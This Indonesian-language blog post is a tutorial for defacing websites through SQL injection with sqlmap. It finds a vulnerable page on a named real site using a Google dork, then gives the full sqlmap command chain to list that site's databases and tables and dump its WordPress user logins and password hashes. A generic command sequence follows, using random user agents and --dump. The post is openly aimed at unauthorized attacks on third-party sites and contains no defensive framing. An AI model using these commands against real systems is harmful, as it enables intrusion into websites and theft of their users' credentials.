+ SELAMAT DATANG DI BLOG KAMI + Deface Website Dengan Metode SQL Injection SQL-MAP HACKED x-ŕíćký wΣb

Kamis, 06 Agustus 2015

Deface Website Dengan Metode SQL Injection SQL-MAP





Assalamu'alaikum sob (^_^). Mungkin tutorial ini agak jadul sob wkwkwkwk, karena sudah banyak blog yang memposting nya !! tapi ngak apa-apalah , untuk mengisi blog saya , adapun tutorial sqlmap pada windows dan bada backtrack hampir sama (^_^) tetapi pada windows agan harus menginstall sqlmap dan python.










Kelebihan menggunakan SQL Map:

1. Bisa melakukan SQL Injection dengen beberapa method seperti:

- Boolean-Based Blind SQL Injection

- Time-Based Blind SQL Injection

- Error-Based SQL Injection

- UNION Query SQL Injection

- Stacked Query SQL Injection

2. Bisa berjalan baik untuk beberapa jenis database seperti:

- MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, SQLite, Firebird, Sybase &SAP MaxDB


Langsung saja buka marinecyber sqli scanner di sini dan tulis google dork di kolumn yang tersedia , kalau google dork nya agan bisa lihat di sini atau di sini , dalam contoh ini saya menggunakan dork "inurl:opinions.php?id="



  • pilih salah satu situs target nya disini saya menggunakan situs di bawah ini
Found : http://golosdoma2.com/opinions.php?id='21 <-- SQLI Vuln Found..





klik ajah link tersebut , dan saya melihat 



Warning: mysql_fetch_assoc() expects parameter 1 to be resource, boolean given in /home/users1/v/victarius/domains/golosdoma2.com/opinions.php on line 25

Bahwa situs tersebut memilki bug , dan insyaallah bisa di masuki sob (^_^)

  • buka command prompt ketik " cd C:\Users\BL4CK_3YE116\Desktop\sqlmap " tanpa tanda petik , directory C:\Users\BL4CK_3YE116\Desktop\sqlmap merupakan directory folder tempat sqlmap berada





  • setelah itu ketik sqlmap.py -u http://situstarget/opinions.php?(sqli) di sini saya menggunakan situs http://golosdoma2.com/opinions.php?id=22 , dan saya mengetik sqlmap.py -u http://golosdoma2.com/opinions.php?id=22 untuk scan situs tersebut




  • lalu ketik sqlmap.py -u http://situstarget/opinions.php?(sqli) --dbs disini saya menggunakan sqlmap.py -u http://golosdoma2.com/opinions.php?id=22 --dbs , untuk melihat database situs tersebut





Saya menemukan  information_schema dan victarius



  • saya menggunakan database " victarius " lalu sqlmap.py -u http://golosdoma2.com/opinions.php?id=22 -D victarius --tables untuk melihat tables dari database tersebut



Saya menemukan table wp_users yang menurut saya menarih , :) hehehe



  • setelah itu ketik sqlmap.py -u http://golosdoma2.com/opinions.php?id=22 -D victarius -T wp_users --column , untuk melhat  column dari tables tersebut , lalu muncul

Saya pilih column ID,user_login,user_pass yang menurut saya menarik (^_^)

  • dump column tersebut dengan cara sqlmap.py -u http://golosdoma2.com/opinions.php?id=22 -D victarius -T wp_users -C ID,user_login,user_pass --dump , lalu muncul dah



Password tersebut adalah MD5 wordpress , dan setahu saya ngak bisa di crack ! :( tapi dalam sqlmap ada tools untuk menebak jenis password tersebut dengan dictionary yang ada :) untuk melihat definisi dan jenis hash bisa di lihat di sin

Tambahan :

Biar lengkap saya kasih step-stepnya:
  • Test injeksi dengan men-fetch banner mysql (versi mysql)
./sqlmap.py -u "http://situs_target.com" --random-agent --threads 10 --banner
  • Fetch user yang digunakan, dan db yang sedang digunakan dengan flag (–current-user dan –current-db), langkah ini ialah analisis user yang dipakai di DBMS dan DB yang sedang digunakan pada website tersebut.
./sqlmap.py -u "http://situs_target.com" --random-agent --threads 10 --current-user --current-db
  •   Fetch list database yang bisa dihandle oleh user website-in@localhost dengan flag (–dbs)
Dengan mengetahui list databse yang lain kita dapat bebas melakukan injeksi pada setiap database yang available untuk di injeksi. ./sqlmap.py -u "http://situs_target.com" --random-agent --threads 10 --dbs
  • Fetch list tables di database portal dengan flag (-D nama_tabel –tables)
./sqlmap.py -u "http://situs_target.com" --random-agent --threads 10 -D nama_tabel --tables
  • Fetch isi kolum pada setiap tables dengan flag (–columns)
./sqlmap.py -u "http://situs_target.com" --random-agent --threads 10 -D nama_tabel  -T nama_kolom --columns
  •  Sekarang kita akan men-fetch hanya isi dari kolum dengan flag (-D nama_tabel -T kolom -C isi_kolom1,isi_kolom2 –dump)
./sqlmap.py -u "http://situs_target.com" --random-agent --threads 10 -D nama_tabel  -T nama_kolom -C isi_kolom1,isi_kolom2 --dump

agan juga bisa menggunakan tools online marinecyber untuk memudahkan agan ,, tools hack di sini , saya menyediakan adminfinder scanner dan sqli scanner
sampai di sin saja saya mohon maaf jika ada salah kata , berhubung saya hanyalah seorang newbie yang ingin mencoba (^_^)
sumber: JCT

0 komentar:

Posting Komentar

./root@HT_X. Diberdayakan oleh Blogger.